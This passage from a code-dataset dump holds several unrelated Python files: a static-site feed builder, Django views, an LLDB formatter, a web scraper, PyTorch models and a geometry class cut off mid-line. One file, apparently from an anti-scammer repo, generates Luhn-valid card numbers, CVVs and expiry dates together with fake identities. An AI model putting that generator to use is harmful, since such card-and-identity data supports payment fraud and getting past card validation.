parse\n :type infile: str\n :return: Generated HTML\n :rtype: str\n \"\"\"\n inpath = os.path.join(self.pages_dir, infile)\n ml = Mulang(inpath, self.encoding)\n meta = Meta(ml.metadata())\n content_html = ml.html(verbose=self.verbose)\n values = self.template_values.copy()\n values['page'] = { #append\n 'title': meta.title(),\n 'raw_title': strip_html_tags(meta.title()),\n 'content': content_html }\n\n outfile = link_to(infile, os.path.join(self.deploy_dir,\n self.pages_dir))\n return self.render_template('page.html.j2', outfile, values)\n\n\n def gen_pages(self):\n \"\"\"Generate all pages.\"\"\"\n for filename in os.listdir(self.pages_dir):\n if os.path.splitext(filename)[1] == self.infile_ext:\n self.gen_page(filename)\n\n\n def gen_feed(self, feed=\"atom\"):\n if feed == \"rss\":\n self.gen_feed_rss()\n else:\n self.gen_feed_atom()\n\n\n def gen_feed_atom(self, outfile='atom.xml'):\n \"\"\"Generate blog Atom feed.\n \"\"\"\n feed = AtomFeed(title=self.site_name if self.site_name \\\n else self.canonical_uri,\n subtitle=self.site_description if self.site_description\n else 'Feed',\n feed_url=os.path.join(self.canonical_uri, self.base_uri, outfile),\n url=os.path.join(self.canonical_uri, self.base_uri),\n author=self.site_author)\n\n entries = list()\n for filename in os.listdir(self.entries_dir):\n if os.path.splitext(filename)[1] == self.infile_ext:\n infile = os.path.join(self.entries_dir, filename)\n ml = Mulang(infile, self.encoding)\n meta = Meta(ml.metadata())\n author = self.site_name if not meta.author() \\\n else meta.author()\n content_html = ml.html(verbose=False)\n private = meta.private()\n title = meta.title()\n date_idx = meta.date('%Y-%m-%d %H:%M:%S')\n timezone = 'UTC' if not meta.date('%Z') else meta.date('%Z')\n date_iso8601 = meta.date('%Y-%m-%dT%H:%M') + timezone\n updated = datetime.strptime(date_iso8601, \\\n '%Y-%m-%dT%H:%M%Z')\n uri = link_to(slugify(title),\n self.entry_link_prefix(filename),\n makedirs=False, justdir=True)\n full_uri = os.path.join(self.canonical_uri,\n self.base_uri, uri)\n\n if not private:\n val = { 'title': strip_html_tags(title),\n 'content_html': content_html,\n 'author': author,\n 'full_uri': full_uri,\n 'date_idx': date_idx,\n 'updated': updated }\n entries.append(val)\n\n # sort chronologically descent\n entries = sorted(entries, key=lambda k: k['date_idx'],\n reverse=True)\n for entry in entries:\n feed.add(title = entry['title'],\n content = entry['content_html'],\n author = entry['author'],\n url = entry['full_uri'],\n updated = entry['updated'])\n\n output_file = codecs.open(os.path.join(self.deploy_dir, \\\n outfile), mode='w', encoding=self.encoding)\n output_file.write(feed.to_string())\n\n\n# def gen_feed_rss(self, outfile='feed.xml'):\n# \"\"\"Generate blog feed.\n#\n# .. todo: Why I cannot do this without changing the locale?\n# \"\"\"\n# # This doesn't work in another locale, will be restored\n# locale.setlocale(locale.LC_ALL, \"en_US\")\n#\n# entries = list()\n# for filename in os.listdir(self.entries_dir):\n# if os.path.splitext(filename)[1] == self.infile_ext:\n# infile = os.path.join(self.entries_dir, filename)\n# ml = Mulang(infile, self.encoding)\n# meta = Meta(ml.metadata())\n# content_html = ml.html(verbose=False)\n# private = meta.private()\n# title = meta.title()\n# summary = meta.summary()\n# date_idx = meta.date('%Y-%m-%d %H:%M:%S')\n# # Date+time in RFC-822 format. fixing lack of timezone\n# # when there's none (UTC by default).\n# timezone = '+0000' if not meta.date('%z') \\\n# else meta.date('%z')\n# pub_date = meta.date('%a, %d %b %Y %H:%M:%S') + \\\n# \" \" + timezone\n# uri = link_to(slugify(title),\n# self.entry_link_prefix(filename),\n# makedirs=False, justdir=True)\n# full_uri = os.path.join(self.canonical_uri,\n# self.base_uri, uri)\n# if not private:\n# val = { 'title': strip_html_tags(title),\n# 'content_html': content_html,\n# #'summary': summary,\n# 'full_uri': full_uri,\n# 'date_idx': date_idx,\n# 'pub_date': pub_date }\n# entries.append(val)\n#\n# # sort chronologically descent\n# entries = sorted(entries, key=lambda k: k['date_idx'],\n# reverse=True)\n# for entry in entries:\n# entries.append(\n# RSS2.RSSItem(\n# title = entry['title'],\n# link = entry['full_uri'],\n# #description = entry['summary'],\n# description = entry['content_html'],\n# guid = RSS2.Guid(entry['full_uri']),\n# pubDate = entry['pub_date']))\n#\n# rss = RSS2.RSS2(\n# title = self.site_name if self.site_name \\\n# else self.canonical_uri,\n# description = \"RSS\",\n# link = self.canonical_uri,\n# lastBuildDate = datetime.now(),\n# items = entries\n# )\n#\n# rss.write_xml(open(os.path.join(self.deploy_dir, outfile), 'w'),\n# self.encoding)\n# # Restore locale\n# locale.setlocale(locale.LC_ALL, self.wlocale)\n\n\n def gen_static(self):\n \"\"\"Generates (copies) static directory.\"\"\"\n src = self.static_dir\n dst = os.path.join(self.deploy_dir, self.static_dir)\n if os.path.exists(src):\n shutil.rmtree(dst, ignore_errors=True)\n shutil.copytree(src, dst)\n\n\n def gen_media(self):\n \"\"\"Generates media directories if they exist.\"\"\"\n if self.extra_dirs:\n for extra_dir in self.extra_dirs:\n src = extra_dir\n dst = os.path.join(self.deploy_dir, extra_dir)\n if os.path.exists(src):\n shutil.rmtree(dst, ignore_errors=True)\n shutil.copytree(src, dst)\n if self.verbose:\n print('Copied directory', src)\n\n\n def gen_site(self):\n \"\"\"Generate all content!.\n \"\"\"\n self.gen_entries(self.date_format_entries)\n self.gen_pages()\n self.gen_archive(self.date_format_list)\n self.gen_tags(self.date_format_list)\n self.gen_tag_cloud()\n self.gen_home(self.max_entries, self.date_format_home)\n self.gen_feed(self.feed_format)\n self.gen_static()\n self.gen_media()\n\n","repo_name":"maRc2/pynfact","sub_path":"pynfact/builder.py","file_name":"builder.py","file_ext":"py","file_size_in_byte":23404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"43959060300","text":"from django.shortcuts import render\nfrom .models import Token\nfrom django.http import Http404\nfrom django.contrib.auth.decorators import login_required\nfrom secrets import token_bytes\nimport json\n\n# Create your views here.\n@login_required\ndef index(request):\n \"\"\"\n View function for index page\n Get Tokens linked to user\n Count them\n Render template and pass context\n\n \"\"\"\n tokens = Token.objects.filter(accounts__id__contains=request.user.id)\n context = {\n \"num_tokens\": Token.objects.count(),\n \"tokens\": tokens\n }\n return render(request, 'index.html', context=context)\n\n\n@login_required\ndef show_token(request, pk):\n \"\"\"\n View function to get token key\n request: HTTP request\n token_id: int value taken from url -> token PK\n\n Try to get the token with id token_id\n Check if it is associated to the user's account\n Generate key if it isn't available\n Render details\n \"\"\"\n try:\n token = Token.objects.get(pk=pk)\n if token in Token.objects.filter(accounts__id__contains=request.user.id):\n if not token.key: # Generate token key if it doesnt exist\n token.key = token_bytes(16)\n token.save()\n\n #\n context = {\n \"key\": json.dumps(list(token.key))\n }\n\n return render(request, 'token.html', context=context)\n else:\n raise Http404('Token not found') # Probably should be a 403 but leaving it ambiguous..\n\n except Token.DoesNotExist:\n raise Http404('Token not found')\n","repo_name":"darylo99/6200FYP-DO","sub_path":"words/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"5024923048","text":"import lldb\nimport objc_runtime\nimport summary_helpers\n\nstatistics = lldb.formatters.metrics.Metrics()\nstatistics.add_metric('invalid_isa')\nstatistics.add_metric('invalid_pointer')\nstatistics.add_metric('unknown_class')\nstatistics.add_metric('code_notrun')\n\n\nclass SKRequest_SynthProvider(object):\n # SKRequest:\n # Offset / size 32bit: 64bit:\n #\n # Class isa 0 = 0x00 / 4 0 = 0x00 / 8\n # SKRequestInternal *_requestInternal 4 = 0x04 / 4 8 = 0x08 / 8\n\n # SKRequestInternal:\n # Offset / size 32bit: 64bit:\n #\n # Class isa 0 = 0x00 / 4 0 = 0x00 / 8\n # int _backgroundTaskIdentifier 4 = 0x04 / 4 8 = 0x08 / 4 + 4\n # SKPaymentQueueClient *_client 8 = 0x08 / 4 16 = 0x10 / 8\n # SKXPCConnection *_connection 12 = 0x0c / 4 24 = 0x18 / 8\n # id _delegate 16 = 0x10 / 4 32 = 0x20 / 8\n # int _state 20 = 0x14 / 4 40 = 0x28 / 4\n\n def __init__(self, value_obj, sys_params, internal_dict):\n super(SKRequest_SynthProvider, self).__init__()\n self.value_obj = value_obj\n self.sys_params = sys_params\n self.internal_dict = internal_dict\n\n self.request_internal = None\n self.update()\n\n def update(self):\n self.adjust_for_architecture()\n # _requestInternal (self->_requestInternal)\n self.request_internal = self.value_obj.GetChildMemberWithName(\"_requestInternal\")\n\n def adjust_for_architecture(self):\n pass\n\n def summary(self):\n return \"\"\n\n\ndef SKRequest_SummaryProvider(value_obj, internal_dict):\n # Class data\n global statistics\n class_data, wrapper = objc_runtime.Utilities.prepare_class_detection(value_obj, statistics)\n summary_helpers.update_sys_params(value_obj, class_data.sys_params)\n if wrapper is not None:\n return wrapper.message()\n\n wrapper = SKRequest_SynthProvider(value_obj, class_data.sys_params, internal_dict)\n if wrapper is not None:\n return wrapper.summary()\n return \"Summary Unavailable\"\n\n\ndef __lldb_init_module(debugger, internal_dict):\n debugger.HandleCommand(\"type summary add -F SKRequest.SKRequest_SummaryProvider \\\n --category StoreKit \\\n SKRequest\")\n debugger.HandleCommand(\"type category enable StoreKit\")\n","repo_name":"fishman/dot_files","sub_path":"lldb/.lldb/Summaries/SKRequest.py","file_name":"SKRequest.py","file_ext":"py","file_size_in_byte":2592,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"19"} +{"seq_id":"32516238942","text":"import requests\nfrom bs4 import BeautifulSoup\nimport json\nimport glob\nimport urllib.request\nfrom PIL import Image\n\n\ndef download_and_convert_photos(images: list) -> list: \n \"\"\"Method used to download images from ist with links which are supposed to be webp images and\n convert them to jpg images\n\n Args:\n images (list): List with links to webp images\n\n Returns:\n list: List with paths to jpg images\n \"\"\"\n jpg_paths = []\n for image in images:\n # download and save image\n filename = image.split('/')[-1]\n path = f\"images/produkty_webp/{filename}\"\n urllib.request.urlretrieve(image, path)\n\n # convert .webp images to .jpg as prestashop 1.7 doesnt support webp \n im = Image.open(path).convert(\"RGB\")\n # remove extension and append .jpg\n filename = f\"{filename.rsplit('.', 1)[0]}.jpg\"\n path = f\"images/produkty_jpg/{filename}\"\n im.save(path,\"jpeg\")\n jpg_paths.append(path)\n return jpg_paths\n\n\ndef get_links(page_link: str) -> list:\n \"\"\"\n Method used to get links of product in store\n \n Args:\n page_link (str): Url of category\n \n Returns:\n product_links (list): Urls of every product in shop\n \"\"\"\n k = requests.get(page_link).text\n bs = BeautifulSoup(k, 'html.parser')\n num = bs.find(\"a\", {\"title\":\"ostatnia strona\"}).get(\"data-pagination\")\n \n product_links = [] \n for page in range(1, int(num) + 1): \n url = f'{page_link}/lp/{page}'\n k = requests.get(url).text\n\n bs = BeautifulSoup(k,'html.parser')\n productlist = bs.find_all(\"div\", {\"class\":\"product-list-item\"})\n \n for product in productlist:\n link = product.find(\"a\", {\"class\":\"product-content-container\"}).get(\"href\") \n product_links.append(link)\n \n return product_links\n\n\ndef get_data(products_links: list, headers: dict) -> list:\n \"\"\"\n Method used to get data of products in store\n\n Args:\n products_links (list): Urls of every product in shop\n headers (dict): user-agent data\n\n Returns:\n data (list): Data of store all products in dictionaries\n \n \"\"\"\n data=[]\n for category in products_links:\n print(category)\n for link in products_links[category]:\n f = requests.get(link,headers=headers).text\n bs = BeautifulSoup(f,'html.parser')\n \n try:\n name = bs.find(\"h1\", {\"class\":\"product-title\"}).text.replace('\\n',\"\")\n except:\n name = None\n\n\n try:\n price = bs.find(\"strong\", {\"class\":\"produkt-cena\"}).text.replace('\\n',\"\").strip().replace(\" \", \"\")\n # remove zl from price, replace , with .\n price = price[:-2].replace(',', '.')\n except:\n price = \"0.0\"\n \n \n try:\n short_about = bs.find(\"div\", {\"class\":\"product-short-description\"}).text.replace('\\n',\"\").strip()\n except:\n short_about=None\n \n \n try:\n selection = []\n selector_description = bs.find(\"label\", {\"class\":\"col-sm-4\"}).text.replace('\\n',\"\")\n \n selector = bs.find(\"select\", {\"class\":\"custom-select\"}).find_all('option')\n for sel in selector:\n selection.append(sel.text.strip())\n except:\n selector_description = None\n selection = None\n \n \n try:\n description = bs.find(\"div\", {\"class\":\"col-sm-9\"}).text\n except:\n description = None\n \n \n try: \n attributes_table = bs.find(\"table\", {\"class\":\"table\"})\n attributes = {}\n for row in attributes_table.findAll('tr'):\n key = row.find('th').text\n value = row.find('td').text\n attributes[key] = value \n except:\n attributes = None\n \n \n try:\n images = []\n img_divs = bs.find_all(\"div\", {\"class\":\"image\"})\n for image_link in img_divs:\n images.append(image_link.find(\"img\").get(\"src\"))\n \n images = download_and_convert_photos(images)\n\n except:\n images = [None]\n \n lamp = {\"category\": category,\n \"name\": name,\n \"price\": price,\n \"short_about\": short_about,\n \"selector_description\": selector_description,\n \"selection\": selection,\n \"description\": description,\n \"attributes\": attributes,\n \"images\": images\n }\n \n data.append(lamp)\n return data\n\ndef retrieve_links() -> dict:\n \"\"\"Method used to retrieve links of products\n\n Returns:\n _type_: _description_\n \"\"\"\n for file in glob.glob(\"./products_data/links.json\"):\n print(file)\n with open(file, 'r', encoding=\"UTF-8\") as infile:\n data = json.load(infile)\n return data\n \ndef save_links():\n \"\"\"\n Method used to save links of all shop categories\n Links are saved in JSON file with categories as keys\n \"\"\"\n categories = ['https://www.skleplampy.pl/kategoria/tasmy-led-291',\n 'https://www.skleplampy.pl/kategoria/lampy-wiszace-i-zyrandole-273',\n 'https://www.skleplampy.pl/kategoria/kinkiety-274',\n 'https://www.skleplampy.pl/kategoria/lampy-sufitowe-i-plafony-275'\n 'https://www.skleplampy.pl/kategoria/lampy-stojace-276',\n 'https://www.skleplampy.pl/kategoria/oprawy-wpuszczane-277',\n 'https://www.skleplampy.pl/kategoria/listwy-reflektory-spoty-278'\n 'https://www.skleplampy.pl/kategoria/lampy-zewnetrzne-wiszace-279',\n 'https://www.skleplampy.pl/kategoria/plafony-zewnetrzne-280',\n 'https://www.skleplampy.pl/kategoria/lampy-ogrodowe-stojace-281',\n 'https://www.skleplampy.pl/kategoria/oprawy-najazdowe-285',\n 'https://www.skleplampy.pl/kategoria/zarowki-286',\n 'https://www.skleplampy.pl/kategoria/wentylatory-287',\n ]\n links = {}\n for link in categories:\n category_name = ''.join([i for i in link.split('/')[-1] if not i.isdigit()])\n links[category_name[:-1]] = get_links(page_link=link)\n \n with open(\"./products_data/lc.json\", 'w', encoding=\"UTF-8\") as outfile:\n json.dump(links, outfile, ensure_ascii=False, indent=4)\n \nif __name__ == '__main__':\n base_url = \"https://www.skleplampy.pl/\"\n headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36'}\n \n # save_links()\n products_links = retrieve_links()\n \n data = get_data(products_links=products_links, headers=headers)\n with open('./products_data/products.json', 'w', encoding=\"UTF-8\") as outfile:\n json.dump(data, outfile, ensure_ascii=False, indent=4)\n","repo_name":"gpawluki/sklep_lampiarski","sub_path":"scrapper.py","file_name":"scrapper.py","file_ext":"py","file_size_in_byte":7409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22450664965","text":"import torch\r\nfrom torch import nn\r\nimport torchvision.models\r\n\r\nclass MiniXception(nn.Module):\r\n def __init__(self, in_channels=3):\r\n super(MiniXception, self).__init__()\r\n\r\n self.conv1 = nn.Conv2d(in_channels=in_channels, out_channels=96, kernel_size=3, stride=2, padding=1, bias=False)\r\n self.bn1 = nn.BatchNorm2d(96)\r\n self.act1 = nn.ReLU()\r\n\r\n self.conv2 = nn.Conv2d(in_channels=96, out_channels=128, kernel_size=3, stride=2, padding=1, bias=False)\r\n self.bn2 = nn.BatchNorm2d(128)\r\n self.act2 = nn.ReLU()\r\n\r\n self.blocks = self._make_xception_blocks(in_channels=128, n=2)\r\n\r\n self.sepconv = DepthwiseSeparableConv(in_channels=512, out_channels=256)\r\n self.pool = nn.AdaptiveAvgPool2d((1, 1))\r\n self.fc = nn.Linear(256, 256)\r\n\r\n def forward(self, x):\r\n x = self.act1(self.bn1(self.conv1(x)))\r\n x = self.act2(self.bn2(self.conv2(x)))\r\n x = self.blocks(x)\r\n x = self.sepconv(x)\r\n x = self.pool(x)\r\n x = torch.flatten(x, 1)\r\n x = self.fc(x)\r\n return x\r\n\r\n def _make_xception_blocks(in_channels, n):\r\n cur_channels = in_channels\r\n blocks = list()\r\n for i in range(n):\r\n blocks.append(MiniXceptionBlock(cur_channels))\r\n cur_channels *= 2\r\n\r\n return nn.Sequential(*blocks)\r\n\r\nclass MiniXceptionBlock(nn.Module):\r\n def __init__(self, in_channels):\r\n super(MiniXceptionBlock, self).__init__()\r\n self.in_channels = in_channels\r\n self.out_channels = 2 * self.in_channels\r\n\r\n self.res_conv = nn.Sequential(\r\n nn.Conv2d(self.in_channels, self.out_channels, kernel_size=1, stride=2, padding=0),\r\n nn.BatchNorm2d(self.out_channels)\r\n )\r\n self.block = nn.Sequential(\r\n DepthwiseSeparableConv(self.in_channels, self.out_channels),\r\n nn.BatchNorm2d(self.out_channels),\r\n nn.ReLU(),\r\n DepthwiseSeparableConv(self.out_channels, self.out_channels),\r\n nn.BatchNorm2d(self.out_channels),\r\n nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\r\n )\r\n\r\n def forward(self, x):\r\n return self.res_conv(x) + self.block(x)\r\n\r\n\r\nclass DepthwiseSeparableConv(nn.Module):\r\n def __init__(self, in_channels, out_channels, kernel_size=3, padding=1):\r\n super(DepthwiseSeparableConv, self).__init__()\r\n self.depthwise = nn.Conv2d(in_channels, in_channels, kernel_size=kernel_size, padding=padding, groups=in_channels, bias=False)\r\n self.pointwise = nn.Conv2d(in_channels, out_channels, kernel_size=1, bias=False)\r\n\r\n def forward(self, x):\r\n x = self.depthwise(x)\r\n x = self.pointwise(x)\r\n return x\r\n\r\nclass ResNet18(nn.Module):\r\n def __init__(self, emotion_map):\r\n super(ResNet18, self).__init__()\r\n self.net = torchvision.models.resnet18()\r\n self.net.fc = nn.Linear(self.net.fc.in_features, 50)\r\n\r\n def forward(self, x):\r\n return self.net(x)\r\n\r\n\r\nclass ConvNet(nn.Module):\r\n def __init__(self,):\r\n super(ConvNet, self).__init__()\r\n\r\n self.layer1 = self._make_conv_block(in_channels=3, out_channels=16)\r\n self.layer2 = self._make_conv_block(in_channels=16)\r\n self.layer3 = self._make_conv_block(in_channels=32)\r\n self.layer4 = self._make_conv_block(in_channels=64)\r\n self.layer5 = self._make_conv_block(in_channels=128)\r\n self.layer6 = self._make_conv_block(in_channels=256)\r\n\r\n self.avgpool = nn.AdaptiveAvgPool2d(output_size=(1, 1))\r\n self.fc = nn.Linear(in_features=512, out_features=256)\r\n\r\n @staticmethod\r\n def _make_conv_block(in_channels, out_channels=None):\r\n\r\n if out_channels is None:\r\n out_channels = in_channels * 2\r\n\r\n layers = list()\r\n layers.append(nn.Conv2d(\r\n in_channels=in_channels,\r\n out_channels=out_channels,\r\n kernel_size=3,\r\n stride=1,\r\n padding=1,\r\n bias=False\r\n )\r\n )\r\n layers.append(nn.BatchNorm2d(num_features=out_channels))\r\n layers.append(nn.MaxPool2d(kernel_size=2, stride=2))\r\n layers.append(nn.ReLU())\r\n\r\n return nn.Sequential(*layers)\r\n\r\n def forward(self, x):\r\n x = self.layer1(x)\r\n x = self.layer2(x)\r\n x = self.layer3(x)\r\n x = self.layer4(x)\r\n x = self.layer5(x)\r\n x = self.layer6(x)\r\n\r\n x = self.avgpool(x)\r\n x = torch.flatten(x, 1)\r\n x = self.fc(x)\r\n return x\r\n\r\nclass PretrConvNet(nn.Module):\r\n def __init__(self, freeze=True):\r\n import pretrainedmodels\r\n super(PretrConvNet, self).__init__()\r\n\r\n self.backbone = pretrainedmodels.resnet34(pretrained='imagenet')\r\n\r\n if freeze:\r\n for param in self.backbone.parameters():\r\n param.requires_grad = False\r\n\r\n self.backbone.last_linear = torch.nn.Linear(self.backbone.last_linear.in_features,256)\r\n\r\n def forward(self, x):\r\n return self.backbone(x)\r\n \r\n#model = MiniXception()\r\n#model = ConvNet()\r\n#model = PretrConvNet()\r\n# img = torch.rand(10,3,224,224)\r\n# x = model(img)\r\n# print(x.size())","repo_name":"Qidian213/Emotion_challenge","sub_path":"emcnet.py","file_name":"emcnet.py","file_ext":"py","file_size_in_byte":5233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"69918226284","text":"import torch\nfrom torch.nn import functional as F\n\n# entropy - measure of surprise\n# 熵越高,惊喜越小\n\n# KL divergence 两个函数越接近,KLD就越接近于0\nx = torch.randn(1, 784)\nw = torch.randn(10, 784)\n\nlogits = x@w.t()\nprint(logits.shape)\n# 使用cross_entropy时默认对输入使用softmax+log, 第二个输入值指的是目标分类的序号\nloss = F.cross_entropy(logits, torch.tensor([4]))\nprint(loss)\n# 想要自己用softmax得话用下面的代码\npred = F.softmax(logits, dim=1)\npred_log = torch.log(pred)\nprint(pred_log)\nloss2 = F.nll_loss(pred_log, torch.tensor([4]))\nprint(loss2)\n","repo_name":"sunstriderLHT/Pytorch-learning","sub_path":"Pytorch Lesson/Gradient/cross_entropy.py","file_name":"cross_entropy.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"8527542453","text":"#!/usr/bin/env python\n\nimport datetime\nfrom random import randint\nimport random\nfrom random import randrange\n\n\n# nombres\ndef Nombre():\n\n VNom = [\n \"Juan\",\n \"Pedro\",\n \"Maria\",\n \"Rocio\",\n \"Jose\",\n \"Antonio\",\n \"Agustin\",\n \"Pablo\",\n \"Alejandro\",\n \"Jessica\",\n \"Noemi\",\n \"Paula\",\n \"Fatima\",\n \"Antonia\",\n \"Ricardo\",\n \"Javier\",\n \"Manuel\",\n \"Luis\",\n \"Laura\",\n \"Sonia\",\n \"Paco\",\n \"Lucia\",\n \"Jaime\",\n \"Rafael\",\n ]\n\n return VNom[randrange(0, len(VNom))]\n\n\ndef Apellidos():\n\n VApell = [\n \"Gomez\",\n \"Troncoso\",\n \"Fernandez\",\n \"Castaño\",\n \"Morales\",\n \"Alcedo\",\n \"Parodi\",\n \"Torres\",\n \"Aguilar\",\n \"Sauco\",\n \"Mangano\",\n \"Ruiz\",\n \"Aragon\",\n \"Candon\",\n \"Acosta\",\n \"Cabeza\",\n \"Soto\",\n \"Ezequiel\",\n \"Pericacho\",\n \"Rodriguez\",\n ]\n\n return VApell[randrange(0, len(VApell))]\n\n\ndef Ciudad():\n\n VCiudad = [\n \"Lavalle\",\n \"San Luis\",\n \"Santa Fe\",\n \"Lujan\",\n \"Formosa\",\n \"Bariloche\",\n \"Santa Cruz\",\n \"Salta\",\n \"Resistencia\",\n \"Buenos Aires\",\n \"Santigo del Estero\",\n ]\n return VCiudad[randrange(0, len(VCiudad))]\n\n\ndef Localidad():\n\n VLocalidad = [\n \"Flores\",\n \"Gernica\",\n \"Mataderos\",\n \"Capital Federal\",\n \"Formosa\",\n \"Resistencia\",\n \"Jujuy\",\n \"Gualeguaychu\",\n \"La pampa\",\n \"La banda\",\n ]\n\n return VLocalidad[randrange(0, len(VLocalidad))]\n\n\ndef Provincia():\n\n VProvincia = [\n \"Buenos Aires\",\n \"Capital Federal\",\n \"Catamarca\",\n \"Chaco\",\n \"Chubut\",\n \"Córdoba\",\n \"Corrientes\",\n \"Entre Ríos\",\n \"Formosa\",\n \"Jujuy\",\n \"La Pampa\",\n \"La Rioja\",\n \"Mendoza\",\n \"Misiones\",\n \"Neuquén\",\n \"Río Negro\",\n \"Salta\",\n \"San Juan\",\n \"San Luis\",\n \"Santa Cruz\",\n \"Santa Fe\",\n \"Santiago del Estero\",\n \"Tierra del Fuego\",\n \"Tucumán\",\n ]\n\n return VProvincia[randrange(0, len(VProvincia))]\n\n\ndef Domicilio():\n\n VDomicilio = [\n \"Lavalle 191\",\n \"Gernica 923\",\n \"Madariaga 781\",\n \"Mendoza 186\",\n \"Formosa 784\",\n \"San Martin 675\",\n \"Jujuy 751\",\n \"Saigon 684\",\n \"Norte 1679\",\n \"Bahia 9712\",\n \"Madrid 191\",\n \"Paris 923\",\n \"Moscu 781\",\n \"Dacota 186\",\n \"Maldonado 784\",\n \"Lujan 675\",\n \"Rivadavia 751\",\n \"Pekin 684\",\n \"Barcelona 1679\",\n \"Bombai 9712\",\n ]\n\n return VDomicilio[randrange(0, len(VDomicilio))]\n\n\ndef compara(i, aleat, dni):\n\n for j in range(i):\n\n if aleat != dni[j]:\n\n return True\n\n elif aleat == dni[j]:\n\n return False\n\n\ndef Dni(num):\n\n dni = []\n\n dni.append(randrange(10, 10001))\n\n for i in range(num):\n\n aleat = randrange(10, 10001)\n\n a = compara(i, aleat, dni)\n\n if a == True:\n\n dni.append(aleat)\n\n elif a == False:\n\n i = i - 1\n\n return dni\n\n\n# creamos numeros aleatorios de celulares\ndef create_phone():\n # Segundo dígito\n second = [3, 4, 5, 7, 8][random.randint(0, 4)]\n # Tercer dígito\n third = {\n 3: random.randint(0, 9),\n 4: [5, 7, 9][random.randint(0, 2)],\n 5: [i for i in range(10) if i != 4][random.randint(0, 8)],\n 7: [i for i in range(10) if i not in [4, 9]][random.randint(0, 7)],\n 8: random.randint(0, 9),\n }[second]\n # Últimos ocho dígitos\n suffix = random.randint(9999999, 100000000)\n # Fusionar número de teléfono\n return \"1{}{}{}\".format(second, third, suffix)\n # Generar número de teléfono móvil\n\n\n# print(celular)\n\n\n# CHECKER BASADO EN ALGORITMO LUHN\ndef cardLuhnChecksumIsValid(card_number):\n \"\"\"checks to make sure that the card passes a luhn mod-10 checksum\"\"\"\n\n sum = 0\n num_digits = len(card_number)\n oddeven = num_digits & 1\n\n for count in range(0, num_digits):\n digit = int(card_number[count])\n\n if not ((count & 1) ^ oddeven):\n digit = digit * 2\n if digit > 9:\n digit = digit - 9\n\n sum = sum + digit\n\n return (sum % 10) == 0\n\n\n# GENERA UNA BASE DE BIN XXXXXXXXXXXXXXXX\n\n\ndef ccgen(bin_format):\n out_cc = \"\"\n if len(bin_format) == 16:\n # Iteration over the bin\n for i in range(15):\n if bin_format[i] in (\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"):\n out_cc = out_cc + bin_format[i]\n continue\n if bin_format[i] in (\"x\"):\n out_cc = out_cc + str(randint(0, 9))\n\n # Generate checksum (last digit) -- IMPLICIT CHECK\n for i in range(10):\n checksum_check = out_cc\n checksum_check = checksum_check + str(i)\n\n if cardLuhnChecksumIsValid(checksum_check):\n out_cc = checksum_check\n break\n else:\n checksum_check = out_cc\n\n return out_cc\n\n\n# Write on a file that takes a list for the argument\ndef save(generated):\n now = datetime.datetime.now()\n file_name = \"cc-gen_output_{0}.txt\".format(\n str(now.day) + str(now.hour) + str(now.minute) + str(now.second)\n )\n f = open(file_name, \"w\")\n for line in generated:\n f.write(line + \"\\n\")\n f.close\n\n\n# Random ccv gen\ndef ccvgen():\n ccv = \"\"\n num = randint(10, 999)\n\n if num < 100:\n ccv = \"0\" + str(num)\n else:\n ccv = str(num)\n\n return ccv\n\n\n# codigo postal\ndef codigo_postal_gen():\n postal = \"\"\n num = randint(1000, 9999)\n\n if num < 1000:\n postal = \"0\" + str(num)\n else:\n postal = str(num)\n\n return postal\n\n\ndef email_gen():\n random.seed()\n correoz = [\"@gmail.com\", \"@hotmail.com\", \"@live.com\", \"@yahoo.com\"]\n email = Nombre() + Apellidos() + random.choice(correoz)\n return email\n\n\n# Random exp date\ndef dategen():\n now = datetime.datetime.now()\n date = \"\"\n month = str(randint(1, 12))\n current_year = str(now.year)\n year = str(randint(int(current_year[-2:]) + 1, int(current_year[-2:]) + 6))\n date = month + \"|\" + year\n\n return date\n","repo_name":"0x01x02x03/Anti_Scammers","sub_path":"utility_card_gen.py","file_name":"utility_card_gen.py","file_ext":"py","file_size_in_byte":6427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"31461441523","text":"import csv\nimport math\n\nclass GeoLine:\n\n def __init__(self, coords_one, coords_two):\n if coords_one[0] < coords_two[0]:\n self.start = coords_one\n self.end = coords_two\n elif coords_one[0] > coords_two[0]:\n self.start = coords_two\n self.end = coords_one\n else:\n if coords_one[1] < coords_two[1]:\n self.start = coords_one\n self.end = coords_two\n else:\n self.start = coords_two\n self.end = coords_one\n \n def __str__(self):\n return (self.start, self.end).__str__()\n \n def ray_intersection(self, line):\n line1_lat_start = self.start[0]\n line1_lon_start = self.start[1]\n line1_lat_end = self.end[0]\n line1_lon_end = self.end[1]\n\n line2_lat_start = line.start[0]\n line2_lon_start = line.start[1]\n line2_lat_end = line.end[0]\n line2_lon_end = line.end[1]\n \n line1_lon_const = False\n line2_lon_const = False\n \n slope1 = self.slope()\n if math.isnan(slope1):\n line1_lon_const = True\n \n slope2 = line.slope()\n if math.isnan(slope2):\n line2_lon_const = True\n \n if (round(slope1, 12) == round(slope2, 12)):\n line1_lat_at_0 = round(self.lat(0), 12)\n line2_lat_at_0 = round(line.lat(0), 12)\n if line1_lat_at_0 == line2_lat_at_0:\n return self\n else:\n return math.nan\n elif (line1_lon_const and line2_lon_const):\n if line1_lon_start == line2_lon_start:\n return self\n else:\n return math.nan\n \n elif line1_lon_const:\n lon = line1_lon_start\n lat = line.lat(lon)\n \n elif line2_lon_const:\n lon = line2_lon_start\n lat = self.lat(lon)\n \n else:\n lon = (line2_lat_start -line1_lat_start - line2_lon_start*slope2 + line1_lon_start*slope1)/(slope1-slope2)\n lat= line1_lat_start + (lon - line1_lon_start) * 